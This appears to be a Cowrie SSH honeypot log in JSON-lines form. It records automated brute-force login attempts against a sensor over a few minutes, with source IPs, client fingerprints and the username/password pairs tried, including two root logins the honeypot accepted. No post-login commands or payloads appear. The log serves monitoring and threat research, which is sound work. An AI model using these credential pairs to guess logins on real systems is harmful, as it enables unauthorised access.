{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:45:31.272794Z","src_ip":"196.251.115.108","session":"aec975e9019c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:45:31.274228Z","src_ip":"196.251.115.108","session":"aec975e9019c"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123456789","message":"login attempt [backup/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T23:45:34.327325Z","src_ip":"196.251.115.108","session":"aec975e9019c"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:45:35.504577Z","src_ip":"196.251.115.108","session":"aec975e9019c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":36658,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c045e21f213","protocol":"ssh","message":"New connection: 196.251.115.108:36658 (1.2.3.4:22) [session: 7c045e21f213]","sensor":"my-vps","timestamp":"2025-08-24T23:46:19.190531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:46:19.435342Z","src_ip":"196.251.115.108","session":"7c045e21f213"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:46:19.436556Z","src_ip":"196.251.115.108","session":"7c045e21f213"}
{"eventid":"cowrie.login.failed","username":"backup","password":"12345","message":"login attempt [backup/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T23:46:22.875139Z","src_ip":"196.251.115.108","session":"7c045e21f213"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:46:24.084800Z","src_ip":"196.251.115.108","session":"7c045e21f213"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":43520,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed8a3b331150","protocol":"ssh","message":"New connection: 196.251.115.108:43520 (1.2.3.4:22) [session: ed8a3b331150]","sensor":"my-vps","timestamp":"2025-08-24T23:47:06.955266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:47:07.263612Z","src_ip":"196.251.115.108","session":"ed8a3b331150"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:47:07.264313Z","src_ip":"196.251.115.108","session":"ed8a3b331150"}
{"eventid":"cowrie.login.failed","username":"backup","password":"12345678","message":"login attempt [backup/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T23:47:10.639030Z","src_ip":"196.251.115.108","session":"ed8a3b331150"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:47:11.874002Z","src_ip":"196.251.115.108","session":"ed8a3b331150"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":49052,"dst_ip":"1.2.3.4","dst_port":22,"session":"db314263a795","protocol":"ssh","message":"New connection: 196.251.115.108:49052 (1.2.3.4:22) [session: db314263a795]","sensor":"my-vps","timestamp":"2025-08-24T23:47:54.740351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:47:55.117026Z","src_ip":"196.251.115.108","session":"db314263a795"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:47:55.118051Z","src_ip":"196.251.115.108","session":"db314263a795"}
{"eventid":"cowrie.login.failed","username":"backup","password":"qwerty","message":"login attempt [backup/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T23:47:58.246531Z","src_ip":"196.251.115.108","session":"db314263a795"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:47:59.413234Z","src_ip":"196.251.115.108","session":"db314263a795"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":46282,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbbdf89908fd","protocol":"ssh","message":"New connection: 45.88.8.186:46282 (1.2.3.4:22) [session: fbbdf89908fd]","sensor":"my-vps","timestamp":"2025-08-24T23:48:29.148634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:48:29.618156Z","src_ip":"45.88.8.186","session":"fbbdf89908fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T23:48:29.619874Z","src_ip":"45.88.8.186","session":"fbbdf89908fd"}
{"eventid":"cowrie.login.success","username":"root","password":"5354591","message":"login attempt [root/5354591] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:48:31.452856Z","src_ip":"45.88.8.186","session":"fbbdf89908fd"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:48:32.010404Z","src_ip":"45.88.8.186","session":"fbbdf89908fd"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":54712,"dst_ip":"1.2.3.4","dst_port":22,"session":"80291f2306e8","protocol":"ssh","message":"New connection: 196.251.115.108:54712 (1.2.3.4:22) [session: 80291f2306e8]","sensor":"my-vps","timestamp":"2025-08-24T23:48:43.767123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:48:44.083662Z","src_ip":"196.251.115.108","session":"80291f2306e8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:48:44.084299Z","src_ip":"196.251.115.108","session":"80291f2306e8"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123123","message":"login attempt [backup/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T23:48:47.667377Z","src_ip":"196.251.115.108","session":"80291f2306e8"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:48:48.719149Z","src_ip":"196.251.115.108","session":"80291f2306e8"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":59226,"dst_ip":"1.2.3.4","dst_port":22,"session":"b82c40af36cb","protocol":"ssh","message":"New connection: 196.251.115.108:59226 (1.2.3.4:22) [session: b82c40af36cb]","sensor":"my-vps","timestamp":"2025-08-24T23:49:33.908748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:49:34.222230Z","src_ip":"196.251.115.108","session":"b82c40af36cb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:49:34.222997Z","src_ip":"196.251.115.108","session":"b82c40af36cb"}
{"eventid":"cowrie.login.failed","username":"backup","password":"111111","message":"login attempt [backup/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T23:49:37.298828Z","src_ip":"196.251.115.108","session":"b82c40af36cb"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:49:38.440640Z","src_ip":"196.251.115.108","session":"b82c40af36cb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59528,"dst_ip":"1.2.3.4","dst_port":22,"session":"9201a222622f","protocol":"ssh","message":"New connection: 217.72.205.35:59528 (1.2.3.4:22) [session: 9201a222622f]","sensor":"my-vps","timestamp":"2025-08-24T23:49:42.397302Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:49:42.398332Z","src_ip":"217.72.205.35","session":"9201a222622f"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":34396,"dst_ip":"1.2.3.4","dst_port":22,"session":"85678e559c53","protocol":"ssh","message":"New connection: 196.251.115.108:34396 (1.2.3.4:22) [session: 85678e559c53]","sensor":"my-vps","timestamp":"2025-08-24T23:50:23.705144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:50:23.997949Z","src_ip":"196.251.115.108","session":"85678e559c53"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:50:23.998765Z","src_ip":"196.251.115.108","session":"85678e559c53"}
{"eventid":"cowrie.login.failed","username":"backup","password":"1234567","message":"login attempt [backup/1234567] failed","sensor":"my-vps","timestamp":"2025-08-24T23:50:26.711916Z","src_ip":"196.251.115.108","session":"85678e559c53"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:50:27.975083Z","src_ip":"196.251.115.108","session":"85678e559c53"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":51412,"dst_ip":"1.2.3.4","dst_port":22,"session":"124fc66be289","protocol":"ssh","message":"New connection: 45.88.8.215:51412 (1.2.3.4:22) [session: 124fc66be289]","sensor":"my-vps","timestamp":"2025-08-24T23:50:57.017069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:50:57.372710Z","src_ip":"45.88.8.215","session":"124fc66be289"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T23:50:57.373733Z","src_ip":"45.88.8.215","session":"124fc66be289"}
{"eventid":"cowrie.login.success","username":"root","password":"Bir@123","message":"login attempt [root/Bir@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:50:59.104364Z","src_ip":"45.88.8.215","session":"124fc66be289"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:50:59.469113Z","src_ip":"45.88.8.215","session":"124fc66be289"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":42138,"dst_ip":"1.2.3.4","dst_port":22,"session":"39441e639e2c","protocol":"ssh","message":"New connection: 196.251.115.108:42138 (1.2.3.4:22) [session: 39441e639e2c]","sensor":"my-vps","timestamp":"2025-08-24T23:51:12.407560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:51:12.730441Z","src_ip":"196.251.115.108","session":"39441e639e2c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:51:12.732532Z","src_ip":"196.251.115.108","session":"39441e639e2c"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"123456","message":"login attempt [www-data/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T23:51:16.195400Z","src_ip":"196.251.115.108","session":"39441e639e2c"}
